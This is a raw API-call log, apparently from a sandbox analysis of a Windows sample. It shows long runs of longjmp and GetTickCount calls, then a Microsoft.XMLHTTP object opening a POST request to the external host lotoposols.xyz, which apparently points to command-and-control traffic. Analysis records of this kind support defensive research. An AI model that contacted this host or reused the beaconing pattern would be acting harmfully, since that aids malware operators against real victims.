	[0151.250] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0151.250] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0151.252] GetTickCount () returned 0x115c9d5
	[0151.252] GetTickCount () returned 0x115c9d5
	[0151.252] longjmp () 
	[0151.252] longjmp () 
	[0151.252] longjmp () 
	[0151.253] GetCurrentThreadId () returned 0x9a8
	[0151.253] GetCurrentThreadId () returned 0x9a8
	[0151.253] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0151.253] malloc (_Size=0x80) returned 0x3c88b0
	[0151.253] longjmp () 
	[0151.253] longjmp () 
	[0151.253] longjmp () 
	[0151.253] longjmp () 
	[0151.254] longjmp () 
	[0151.254] longjmp () 
	[0151.254] longjmp () 
	[0151.254] longjmp () 
	[0151.254] longjmp () 
	[0151.254] longjmp () 
	[0151.255] longjmp () 
	[0151.255] longjmp () 
	[0151.255] longjmp () 
	[0151.255] longjmp () 
	[0151.255] longjmp () 
	[0151.255] longjmp () 
	[0151.256] longjmp () 
	[0151.256] longjmp () 
	[0151.256] longjmp () 
	[0151.256] longjmp () 
	[0151.256] longjmp () 
	[0151.256] longjmp () 
	[0151.257] longjmp () 
	[0151.257] longjmp () 
	[0151.257] longjmp () 
	[0151.257] GetTickCount () returned 0x115c9d5
	[0151.257] longjmp () 
	[0151.257] longjmp () 
	[0151.257] longjmp () 
	[0151.258] longjmp () 
	[0151.258] longjmp () 
	[0151.258] longjmp () 
	[0151.258] longjmp () 
	[0151.258] longjmp () 
	[0151.258] longjmp () 
	[0151.259] longjmp () 
	[0151.259] longjmp () 
	[0151.259] longjmp () 
	[0151.259] longjmp () 
	[0151.259] longjmp () 
	[0151.259] longjmp () 
	[0151.259] longjmp () 
	[0151.260] longjmp () 
	[0151.260] longjmp () 
	[0151.260] longjmp () 
	[0151.260] longjmp () 
	[0151.260] longjmp () 
	[0151.260] longjmp () 
	[0151.260] longjmp () 
	[0151.260] longjmp () 
	[0151.261] longjmp () 
	[0151.261] longjmp () 
	[0151.261] longjmp () 
	[0151.261] longjmp () 
	[0151.261] longjmp () 
	[0151.261] longjmp () 
	[0151.262] longjmp () 
	[0151.262] longjmp () 
	[0151.262] GetTickCount () returned 0x115c9e4
	[0151.262] longjmp () 
	[0151.262] longjmp () 
	[0151.262] longjmp () 
	[0151.262] longjmp () 
	[0151.262] longjmp () 
	[0151.263] longjmp () 
	[0151.263] longjmp () 
	[0151.263] longjmp () 
	[0151.263] longjmp () 
	[0151.263] longjmp () 
	[0151.263] longjmp () 
	[0151.263] longjmp () 
	[0151.264] longjmp () 
	[0151.264] longjmp () 
	[0151.264] longjmp () 
	[0151.264] longjmp () 
	[0151.264] longjmp () 
	[0151.264] longjmp () 
	[0151.264] longjmp () 
	[0151.265] longjmp () 
	[0151.265] longjmp () 
	[0151.265] longjmp () 
	[0151.265] longjmp () 
	[0151.265] longjmp () 
	[0151.265] longjmp () 
	[0151.265] longjmp () 
	[0151.266] longjmp () 
	[0151.266] longjmp () 
	[0151.266] longjmp () 
	[0151.266] longjmp () 
	[0151.266] longjmp () 
	[0151.266] longjmp () 
	[0151.266] GetTickCount () returned 0x115c9e4
	[0151.267] longjmp () 
	[0151.267] longjmp () 
	[0151.267] longjmp () 
	[0151.267] longjmp () 
	[0151.267] longjmp () 
	[0151.267] longjmp () 
	[0151.267] longjmp () 
	[0151.267] longjmp () 
	[0151.268] longjmp () 
	[0151.268] longjmp () 
	[0151.268] longjmp () 
	[0151.268] longjmp () 
	[0151.268] longjmp () 
	[0151.268] longjmp () 
	[0151.269] longjmp () 
	[0151.269] longjmp () 
	[0151.269] longjmp () 
	[0151.269] longjmp () 
	[0151.269] longjmp () 
	[0151.269] longjmp () 
	[0151.269] longjmp () 
	[0151.270] longjmp () 
	[0151.270] longjmp () 
	[0151.270] longjmp () 
	[0151.270] longjmp () 
	[0151.270] longjmp () 
	[0151.270] longjmp () 
	[0151.270] longjmp () 
	[0151.271] longjmp () 
	[0151.271] longjmp () 
	[0151.271] longjmp () 
	[0151.271] longjmp () 
	[0151.271] GetTickCount () returned 0x115c9e4
	[0151.271] longjmp () 
	[0151.271] longjmp () 
	[0151.272] longjmp () 
	[0151.272] longjmp () 
	[0151.272] longjmp () 
	[0151.272] longjmp () 
	[0151.272] longjmp () 
	[0151.272] longjmp () 
	[0151.272] longjmp () 
	[0151.273] longjmp () 
	[0151.273] longjmp () 
	[0151.273] longjmp () 
	[0151.273] longjmp () 
	[0151.273] longjmp () 
	[0151.273] longjmp () 
	[0151.273] longjmp () 
	[0151.274] longjmp () 
	[0151.274] longjmp () 
	[0151.274] longjmp () 
	[0151.274] longjmp () 
	[0151.274] longjmp () 
	[0151.275] longjmp () 
	[0151.275] longjmp () 
	[0151.275] longjmp () 
	[0151.275] longjmp () 
	[0151.275] longjmp () 
	[0151.275] longjmp () 
	[0151.275] longjmp () 
	[0151.276] longjmp () 
	[0151.276] longjmp () 
	[0151.276] longjmp () 
	[0151.276] longjmp () 
	[0151.276] GetTickCount () returned 0x115c9f4
	[0151.276] longjmp () 
	[0151.276] longjmp () 
	[0151.277] longjmp () 
	[0151.277] longjmp () 
	[0151.277] longjmp () 
	[0151.277] longjmp () 
	[0151.277] longjmp () 
	[0151.277] longjmp () 
	[0151.277] longjmp () 
	[0151.278] longjmp () 
	[0151.278] longjmp () 
	[0151.278] longjmp () 
	[0151.278] longjmp () 
	[0151.278] longjmp () 
	[0151.279] longjmp () 
	[0151.279] longjmp () 
	[0151.279] longjmp () 
	[0151.279] longjmp () 
	[0151.279] longjmp () 
	[0151.279] longjmp () 
	[0151.280] longjmp () 
	[0151.280] longjmp () 
	[0151.280] longjmp () 
	[0151.280] longjmp () 
	[0151.280] longjmp () 
	[0151.281] longjmp () 
	[0151.281] longjmp () 
	[0151.281] longjmp () 
	[0151.281] longjmp () 
	[0151.281] longjmp () 
	[0151.281] longjmp () 
	[0151.281] longjmp () 
	[0151.282] GetTickCount () returned 0x115c9f4
	[0151.282] longjmp () 
	[0151.282] longjmp () 
	[0151.282] longjmp () 
	[0151.282] longjmp () 
	[0151.282] longjmp () 
	[0151.282] longjmp () 
	[0151.282] longjmp () 
	[0151.283] longjmp () 
	[0151.283] longjmp () 
	[0151.283] longjmp () 
	[0151.283] longjmp () 
	[0151.283] longjmp () 
	[0151.283] longjmp () 
	[0151.284] longjmp () 
	[0151.284] longjmp () 
	[0151.284] longjmp () 
	[0151.284] longjmp () 
	[0151.284] longjmp () 
	[0151.284] longjmp () 
	[0151.284] longjmp () 
	[0151.285] longjmp () 
	[0151.285] longjmp () 
	[0151.285] longjmp () 
	[0151.285] longjmp () 
	[0151.285] longjmp () 
	[0151.285] longjmp () 
	[0151.285] longjmp () 
	[0151.285] longjmp () 
	[0151.286] longjmp () 
	[0151.286] longjmp () 
	[0151.286] longjmp () 
	[0151.286] longjmp () 
	[0151.286] GetTickCount () returned 0x115c9f4
	[0151.286] longjmp () 
	[0151.286] longjmp () 
	[0151.287] longjmp () 
	[0151.287] longjmp () 
	[0151.287] longjmp () 
	[0151.287] longjmp () 
	[0151.287] longjmp () 
	[0151.287] longjmp () 
	[0151.287] longjmp () 
	[0151.288] longjmp () 
	[0151.288] longjmp () 
	[0151.288] longjmp () 
	[0151.288] longjmp () 
	[0151.288] longjmp () 
	[0151.288] longjmp () 
	[0151.288] longjmp () 
	[0151.289] longjmp () 
	[0151.289] longjmp () 
	[0151.289] longjmp () 
	[0151.289] longjmp () 
	[0151.289] longjmp () 
	[0151.289] longjmp () 
	[0151.290] longjmp () 
	[0151.290] longjmp () 
	[0151.290] longjmp () 
	[0151.290] longjmp () 
	[0151.290] longjmp () 
	[0151.290] longjmp () 
	[0151.290] longjmp () 
	[0151.291] longjmp () 
	[0151.291] longjmp () 
	[0151.291] longjmp () 
	[0151.291] GetTickCount () returned 0x115ca04
	[0151.291] longjmp () 
	[0151.291] longjmp () 
	[0151.291] longjmp () 
	[0151.291] longjmp () 
	[0151.292] longjmp () 
	[0151.292] longjmp () 
	[0151.292] longjmp () 
	[0151.292] longjmp () 
	[0151.292] longjmp () 
	[0151.292] longjmp () 
	[0151.293] longjmp () 
	[0151.293] longjmp () 
	[0151.293] longjmp () 
	[0151.293] longjmp () 
	[0151.293] longjmp () 
	[0151.293] longjmp () 
	[0151.293] longjmp () 
	[0151.294] longjmp () 
	[0151.294] longjmp () 
	[0151.294] longjmp () 
	[0151.294] longjmp () 
	[0151.294] longjmp () 
	[0151.294] longjmp () 
	[0151.294] longjmp () 
	[0151.295] longjmp () 
	[0151.295] longjmp () 
	[0151.295] longjmp () 
	[0151.295] longjmp () 
	[0151.295] longjmp () 
	[0151.295] longjmp () 
	[0151.296] longjmp () 
	[0151.296] longjmp () 
	[0151.296] GetTickCount () returned 0x115ca04
	[0151.296] longjmp () 
	[0151.296] longjmp () 
	[0151.296] longjmp () 
	[0151.296] longjmp () 
	[0151.296] longjmp () 
	[0151.297] longjmp () 
	[0151.297] longjmp () 
	[0151.297] longjmp () 
	[0151.297] longjmp () 
	[0151.297] longjmp () 
	[0151.297] longjmp () 
	[0151.297] longjmp () 
	[0151.298] longjmp () 
	[0151.298] longjmp () 
	[0151.298] longjmp () 
	[0151.298] longjmp () 
	[0151.298] longjmp () 
	[0151.298] longjmp () 
	[0151.298] longjmp () 
	[0151.299] longjmp () 
	[0151.299] longjmp () 
	[0151.299] longjmp () 
	[0151.299] longjmp () 
	[0151.299] longjmp () 
	[0151.299] longjmp () 
	[0151.300] longjmp () 
	[0151.300] longjmp () 
	[0151.300] longjmp () 
	[0151.300] longjmp () 
	[0151.300] longjmp () 
	[0151.300] longjmp () 
	[0151.300] longjmp () 
	[0151.301] GetTickCount () returned 0x115ca04
	[0151.301] longjmp () 
	[0151.301] longjmp () 
	[0151.301] longjmp () 
	[0151.301] longjmp () 
	[0151.301] longjmp () 
	[0151.301] longjmp () 
	[0151.301] longjmp () 
	[0151.302] longjmp () 
	[0151.302] longjmp () 
	[0151.302] longjmp () 
	[0151.302] longjmp () 
	[0151.302] longjmp () 
	[0151.302] longjmp () 
	[0151.302] longjmp () 
	[0151.303] longjmp () 
	[0151.303] longjmp () 
	[0151.303] longjmp () 
	[0151.303] longjmp () 
	[0151.303] longjmp () 
	[0151.303] longjmp () 
	[0151.303] longjmp () 
	[0151.304] longjmp () 
	[0151.304] longjmp () 
	[0151.304] longjmp () 
	[0151.304] longjmp () 
	[0151.304] longjmp () 
	[0151.304] longjmp () 
	[0151.304] longjmp () 
	[0151.305] longjmp () 
	[0151.305] longjmp () 
	[0151.305] longjmp () 
	[0151.305] longjmp () 
	[0151.305] GetTickCount () returned 0x115ca13
	[0151.305] longjmp () 
	[0151.305] longjmp () 
	[0151.306] longjmp () 
	[0151.306] longjmp () 
	[0151.306] longjmp () 
	[0151.306] longjmp () 
	[0151.306] longjmp () 
	[0151.306] longjmp () 
	[0151.306] longjmp () 
	[0151.307] longjmp () 
	[0151.307] longjmp () 
	[0151.307] longjmp () 
	[0151.307] longjmp () 
	[0151.307] longjmp () 
	[0151.307] longjmp () 
	[0151.307] longjmp () 
	[0151.307] longjmp () 
	[0151.308] longjmp () 
	[0151.308] longjmp () 
	[0151.308] longjmp () 
	[0151.308] longjmp () 
	[0151.308] longjmp () 
	[0151.308] longjmp () 
	[0151.308] longjmp () 
	[0151.309] longjmp () 
	[0151.309] longjmp () 
	[0151.309] longjmp () 
	[0151.309] longjmp () 
	[0151.309] longjmp () 
	[0151.309] longjmp () 
	[0151.309] longjmp () 
	[0151.310] longjmp () 
	[0151.310] GetTickCount () returned 0x115ca13
	[0151.310] longjmp () 
	[0151.310] longjmp () 
	[0151.310] longjmp () 
	[0151.310] longjmp () 
	[0151.310] longjmp () 
	[0151.310] longjmp () 
	[0151.311] longjmp () 
	[0151.311] longjmp () 
	[0151.311] longjmp () 
	[0151.311] longjmp () 
	[0151.311] longjmp () 
	[0151.311] longjmp () 
	[0151.311] longjmp () 
	[0151.312] longjmp () 
	[0151.312] longjmp () 
	[0151.312] longjmp () 
	[0151.312] longjmp () 
	[0151.312] longjmp () 
	[0151.312] longjmp () 
	[0151.312] longjmp () 
	[0151.313] longjmp () 
	[0151.313] longjmp () 
	[0151.313] longjmp () 
	[0151.313] longjmp () 
	[0151.313] longjmp () 
	[0151.313] longjmp () 
	[0151.313] longjmp () 
	[0151.313] longjmp () 
	[0151.314] longjmp () 
	[0151.314] longjmp () 
	[0151.314] longjmp () 
	[0151.314] longjmp () 
	[0151.314] GetTickCount () returned 0x115ca13
	[0151.314] longjmp () 
	[0151.314] longjmp () 
	[0151.315] longjmp () 
	[0151.315] longjmp () 
	[0151.315] longjmp () 
	[0151.315] longjmp () 
	[0151.315] longjmp () 
	[0151.315] longjmp () 
	[0151.315] longjmp () 
	[0151.316] longjmp () 
	[0151.316] longjmp () 
	[0151.316] longjmp () 
	[0151.316] longjmp () 
	[0151.316] longjmp () 
	[0151.316] longjmp () 
	[0151.316] longjmp () 
	[0151.316] longjmp () 
	[0151.317] longjmp () 
	[0151.317] longjmp () 
	[0151.317] longjmp () 
	[0151.318] longjmp () 
	[0151.319] longjmp () 
	[0151.319] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0151.319] SysStringLen (param_1=0x0) returned 0x0
	[0151.319] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0151.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0151.319] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0151.319] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0151.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c08) returned 0x0
	[0151.319] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0151.319] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c08, pUnkSite=0x3cacc0) returned 0x0
	[0151.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0151.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0151.320] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0151.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0151.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0151.320] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0151.320] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0151.320] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0151.320] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0151.320] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0151.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0151.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0151.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0151.321] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0151.321] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0151.321] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0151.321] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0151.321] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0151.321] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0151.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0151.322] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0151.322] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0151.322] XMLHTTPRequest:IUnknown:Release (This=0x47a5c08) returned 0x0
	[0151.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0151.322] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0151.322] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0151.322] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0151.322] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0151.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0151.322] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0151.325] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0151.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0151.325] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
